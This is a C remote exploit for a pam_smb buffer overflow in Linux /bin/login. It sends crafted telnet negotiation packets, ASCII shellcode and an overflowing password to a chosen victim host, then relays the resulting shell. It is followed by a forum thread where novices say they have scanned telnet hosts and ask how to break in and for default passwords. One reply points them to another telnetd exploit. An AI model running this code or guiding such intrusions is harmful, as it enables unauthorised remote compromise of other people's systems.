/*
* Linux pam_lib_smb < 1.1.6 /bin/login exploit
* by vertex
*
* Tested on Redhat 8.0, 9.0
*
*
* Advisory at
* http://us2.samba.org/samba/ftp/pam_smb/
*
* code based on : UC_login.c
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* [mikecc/unixclan]
*
* =============================================================
* In order to use pam_lib_smb, need to add following line on top
* of /etc/pam.d/login
*
* auth required /lib/security/pam_smb_auth.so
*
* And config the /etc/pam_smb.conf correctly.
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb,
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,
0x64, 0x73,

/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa,
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f,
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50,
0x4c, 0x41, 0x59, 0x01,
};

char packet_2_1[]={

0x6c, 0x69, 0x64, 0x73,
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };

/* here is the TERM value */
/*
*/

void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);

/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";


int main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
char exp[1024];
int a;
char *default_port = "23";

printf("linux_pam_smb\n");
printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
printf("[vertex//lids/org]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] \n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;

case 'p':
port = atoi(optarg);
break;

default:
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (port < 0)
port = atoi(default_port);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf("[*] attacking %s:%d\n",host,port);
printf("[*] opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf("[*] connected!\n");
printf("[*] Begin negotiate... \n");
negotiate(sd);
printf("[*] Login... \n");
login(sd);
return 0;
}


void login(int sd)
{
char buf[1024];
char exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set rset;

memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30 */
/* eb 30 fe ff bf */

x = 0;
exploit_buf[x++]=0x68;
/* push 0xbffffe30 */
/* shellcode address */
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/* ret */
exploit_buf[x++]=0xc3;

memset(exploit_buf+x,'A',150);
x+=150;

/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;

sleep(2);

memset(buf,'\0',sizeof(buf));
strcpy(buf, "xie\r\n\0");

printf("[*] sending username \n");
sendstr(sd,buf,strlen(buf));

sleep(1);
printf("[*] sending password\n");
sleep(2);

memset(buf,'\0',sizeof(buf));
strcpy(buf, exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));

sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}

/*
* telnet negotiation needed for
* talking with the telnet protocol
*/

void negotiate(int sd)
{
char buf[1024];
char nop[64];
int len;

sendstr(sd, packet_1,sizeof(packet_1));
sleep(2);

memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/* adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode */
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left packet */
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1)
);

len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd, buf, len);
sleep(1);

/* wont echo */
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo */
cmd(sd,TELOPT_ECHO);

sleep(2);
}

/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/

void wont(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}

/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/

void will(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
void cmd(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c\xfd%c",IAC,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
*
*/
void sendstr(int sd,char *str,int length)
{

write(sd,str,length);
sleep(1);
}

ive scanned for port 23 and found many results .. but i dont know how to hack them .. and could somebody recompile this .. coz i know i did something wrong

cya

so what does it do exactly?

is it bypassing the login 4 an existing (non-root)account or gives it back a rootshell
or something completely different...

didn't find a proper advisory

well .. i did get access to hubs .. but that where samba i'net switches .. dont know what I can do with that thing

i am running the linux.exe file from a win32 box then it's asking me for passwords and stuff what would be some default passwords?

and commands if possible new to linux

I don't try to be mean, but if you guys don't even know what the exploit code is doing, let alone have any Linux knowledge, you SHOULD NOT be trying to hack any server using this code. Trust me, if you don't know how to compile it, you don't know enough to save yourself from getting caught. Do yourself a favour.

The vulnerability is a buffer overflow in /bin/login, possibly allowing remot code execution. There's an advisory here.


-Shaun.

Shaun,
You seemed smarter then the rest tho, what you posted was a PoC. Here's the real advi:
http://www.securiteam.com/unixfocus/6X00G0K3FM.html

And yes, be aware of what you guys are doing. Although most of you use it for personal use etc still be aware of what you're doing. Best way is to check the code first. And yes, i agree with shaun, if you don't know how to compile then atleast do not use these exploits. It can get you caught, send to jail, and reuened your life. So please be careful, for you're family's/friends lifes also.
Thank you,

Btw, i'm back from vacation, had a wonderful time...

good luck you guys!

Greetings,
woutiir

Welcome back woutir!!

Better have some tee shirts for us or you can go back and get em!!!

HaHAHAaHAa,

Nah, i didn't brough souvanirs, they were WAY to spensive in south-france (i've been in Avignon) --> Sur le pont d'avignon, on y danse, you know the song

Anyways..

I hope to contribute again soon

Later mate,
woutiir

Hey woutiir, welcome back from your holiday, I'm glad you enjoyed yourself.

Thanks, I saw the link to securiteam when I was googling for these guys, presumed that was the advisory. Thanks for posting the real one. Woutiir said it all, come on you guys, learn about what you're trying to do first. Some say they don't know much about Linux, well, what would you do if you happened to get in? Think about that.

Well, I'm back at school tomorrow, I dare say this is the first time that I'm not devastated. I'm going into Year 10 (equivalent to grade 10), a new school year, new possibilities.


-Shaun.

if U would like to hack SunOS =< 5.7 you don't need to use this exploit because was published exploit for telnetd, just look for.